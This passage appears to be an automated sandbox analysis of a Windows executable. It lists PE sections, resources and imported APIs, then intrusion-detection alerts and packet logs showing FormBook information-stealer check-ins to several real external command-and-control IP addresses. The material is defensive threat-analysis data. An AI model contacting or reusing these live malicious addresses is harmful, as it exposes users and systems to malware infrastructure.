                                      .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                      RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                      RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                      RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                      RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                      RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                      RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                      RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                      RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                      RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                      RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                      RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                      RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                      RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                      RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                      RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                      RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                      RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                      RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                      RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                      RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                      RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                      RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                      RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                      RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                      RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                      RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                      DLLImport
                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                      USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                      GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                      OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishGreat Britain
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-09-22T17:36:01.382042+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249717199.59.243.22780TCP
                                      2024-09-22T17:36:16.968225+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124971984.32.84.3280TCP
                                      2024-09-22T17:36:19.511860+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124972084.32.84.3280TCP
                                      2024-09-22T17:36:22.070411+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124972184.32.84.3280TCP
                                      2024-09-22T17:36:24.650384+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.124972284.32.84.3280TCP
                                      2024-09-22T17:36:30.197329+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.12497233.33.130.19080TCP
                                      2024-09-22T17:36:32.697494+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.12497243.33.130.19080TCP
                                      2024-09-22T17:36:35.264913+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.12497253.33.130.19080TCP
                                      2024-09-22T17:36:38.487296+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.12497263.33.130.19080TCP
                                      2024-09-22T17:36:44.478633+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249727194.85.61.7680TCP
                                      2024-09-22T17:36:47.045148+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249728194.85.61.7680TCP
                                      2024-09-22T17:36:49.547523+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249729194.85.61.7680TCP
                                      2024-09-22T17:36:52.091838+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249730194.85.61.7680TCP
                                      2024-09-22T17:36:58.825066+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249731162.0.238.24680TCP
                                      2024-09-22T17:37:01.747490+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249732162.0.238.24680TCP
                                      2024-09-22T17:37:04.172323+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249733162.0.238.24680TCP
                                      2024-09-22T17:37:06.833599+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249734162.0.238.24680TCP
                                      2024-09-22T17:37:13.067528+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124973538.47.233.6580TCP
                                      2024-09-22T17:37:15.650971+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124973638.47.233.6580TCP
                                      2024-09-22T17:37:18.184295+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124973738.47.233.6580TCP
                                      2024-09-22T17:37:20.989836+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.124973838.47.233.6580TCP
                                      2024-09-22T17:37:26.685467+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249739217.70.184.5080TCP
                                      2024-09-22T17:37:29.381168+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249740217.70.184.5080TCP
                                      2024-09-22T17:37:31.889938+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249741217.70.184.5080TCP
                                      2024-09-22T17:37:34.402433+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249742217.70.184.5080TCP
                                      2024-09-22T17:37:40.150166+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124974352.223.13.4180TCP
                                      2024-09-22T17:37:42.776764+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124974452.223.13.4180TCP
                                      2024-09-22T17:37:45.264860+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124974552.223.13.4180TCP
                                      2024-09-22T17:37:47.855807+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.124974652.223.13.4180TCP
                                      2024-09-22T17:37:53.614412+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.12497473.33.130.19080TCP
                                      2024-09-22T17:37:56.204351+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.12497483.33.130.19080TCP
                                      2024-09-22T17:37:58.851877+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.12497493.33.130.19080TCP
                                      2024-09-22T17:38:01.311469+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.12497503.33.130.19080TCP
                                      2024-09-22T17:38:06.979934+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249751134.119.247.13680TCP
                                      2024-09-22T17:38:09.553352+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249752134.119.247.13680TCP
                                      2024-09-22T17:38:12.094671+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249753134.119.247.13680TCP
                                      2024-09-22T17:38:14.705558+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249754134.119.247.13680TCP
                                      2024-09-22T17:38:28.468371+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249755208.91.197.2780TCP
                                      2024-09-22T17:38:31.090903+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249756208.91.197.2780TCP
                                      2024-09-22T17:38:33.624573+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249757208.91.197.2780TCP
                                      2024-09-22T17:38:37.021983+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249758208.91.197.2780TCP
                                      2024-09-22T17:38:43.199998+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249759156.226.22.23380TCP
                                      2024-09-22T17:38:45.752878+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249760156.226.22.23380TCP
                                      2024-09-22T17:38:48.779505+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249761156.226.22.23380TCP
                                      2024-09-22T17:38:50.995647+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249762156.226.22.23380TCP
                                      2024-09-22T17:38:57.155807+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249763206.119.82.17280TCP
                                      2024-09-22T17:38:59.711683+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249764206.119.82.17280TCP
                                      2024-09-22T17:39:02.576895+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249765206.119.82.17280TCP
                                      2024-09-22T17:39:04.941344+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249766206.119.82.17280TCP
                                      2024-09-22T17:39:11.129337+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249767194.58.112.17480TCP
                                      2024-09-22T17:39:13.648944+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249768194.58.112.17480TCP
                                      2024-09-22T17:39:16.625364+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249769194.58.112.17480TCP
                                      2024-09-22T17:39:20.724641+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249770194.58.112.17480TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 22, 2024 17:36:00.886590958 CEST4971780192.168.2.12199.59.243.227
                                      Sep 22, 2024 17:36:00.895088911 CEST8049717199.59.243.227192.168.2.12
                                      Sep 22, 2024 17:36:00.895205021 CEST4971780192.168.2.12199.59.243.227
                                      Sep 22, 2024 17:36:00.902777910 CEST4971780192.168.2.12199.59.243.227
                                      Sep 22, 2024 17:36:00.908427000 CEST8049717199.59.243.227192.168.2.12
                                      Sep 22, 2024 17:36:01.381788015 CEST8049717199.59.243.227192.168.2.12
                                      Sep 22, 2024 17:36:01.381926060 CEST8049717199.59.243.227192.168.2.12
                                      Sep 22, 2024 17:36:01.382041931 CEST4971780192.168.2.12199.59.243.227
                                      Sep 22, 2024 17:36:01.382093906 CEST8049717199.59.243.227192.168.2.12
                                      Sep 22, 2024 17:36:01.382167101 CEST4971780192.168.2.12199.59.243.227
                                      Sep 22, 2024 17:36:01.385221004 CEST4971780192.168.2.12199.59.243.227
                                      Sep 22, 2024 17:36:01.390033960 CEST8049717199.59.243.227192.168.2.12
                                      Sep 22, 2024 17:36:16.487411976 CEST4971980192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:16.492305040 CEST804971984.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:16.492418051 CEST4971980192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:16.502476931 CEST4971980192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:16.507375956 CEST804971984.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:16.968111992 CEST804971984.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:16.968225002 CEST4971980192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:18.012736082 CEST4971980192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:18.018652916 CEST804971984.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:19.042576075 CEST4972080192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:19.047506094 CEST804972084.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:19.047579050 CEST4972080192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:19.058093071 CEST4972080192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:19.065169096 CEST804972084.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:19.511765957 CEST804972084.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:19.511859894 CEST4972080192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:20.559520960 CEST4972080192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:20.564429998 CEST804972084.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:21.578145981 CEST4972180192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:21.583142996 CEST804972184.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:21.583273888 CEST4972180192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:21.656411886 CEST4972180192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:21.661343098 CEST804972184.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:21.661607027 CEST804972184.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:22.070301056 CEST804972184.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:22.070410967 CEST4972180192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:23.168731928 CEST4972180192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:23.173687935 CEST804972184.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.187665939 CEST4972280192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:24.192600965 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.192735910 CEST4972280192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:24.199644089 CEST4972280192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:24.204449892 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650161028 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650187016 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650197029 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650239944 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650279999 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650290966 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650304079 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650383949 CEST4972280192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:24.650402069 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650420904 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650434971 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650438070 CEST4972280192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:24.650455952 CEST4972280192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:24.650474072 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:24.650506020 CEST4972280192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:24.650526047 CEST4972280192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:24.657032013 CEST4972280192.168.2.1284.32.84.32
                                      Sep 22, 2024 17:36:24.661973953 CEST804972284.32.84.32192.168.2.12
                                      Sep 22, 2024 17:36:29.690718889 CEST4972380192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:29.696913958 CEST80497233.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:29.697185040 CEST4972380192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:29.707791090 CEST4972380192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:29.714868069 CEST80497233.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:30.197263002 CEST80497233.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:30.197329044 CEST4972380192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:31.216407061 CEST4972380192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:31.226023912 CEST80497233.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:32.238420010 CEST4972480192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:32.243480921 CEST80497243.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:32.243604898 CEST4972480192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:32.254132986 CEST4972480192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:32.261362076 CEST80497243.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:32.696171045 CEST80497243.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:32.697494030 CEST4972480192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:33.762732029 CEST4972480192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:33.803792953 CEST80497243.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:34.781393051 CEST4972580192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:34.787467957 CEST80497253.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:34.787589073 CEST4972580192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:34.798419952 CEST4972580192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:34.804575920 CEST80497253.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:34.804699898 CEST80497253.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:35.264827967 CEST80497253.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:35.264913082 CEST4972580192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:36.309370041 CEST4972580192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:36.314342976 CEST80497253.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:37.328052998 CEST4972680192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:37.334991932 CEST80497263.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:37.335104942 CEST4972680192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:37.342082977 CEST4972680192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:37.347054005 CEST80497263.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:38.486999989 CEST80497263.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:38.487020969 CEST80497263.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:38.487030983 CEST80497263.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:38.487067938 CEST80497263.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:38.487268925 CEST80497263.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:38.487296104 CEST4972680192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:38.487369061 CEST4972680192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:38.487391949 CEST4972680192.168.2.123.33.130.190
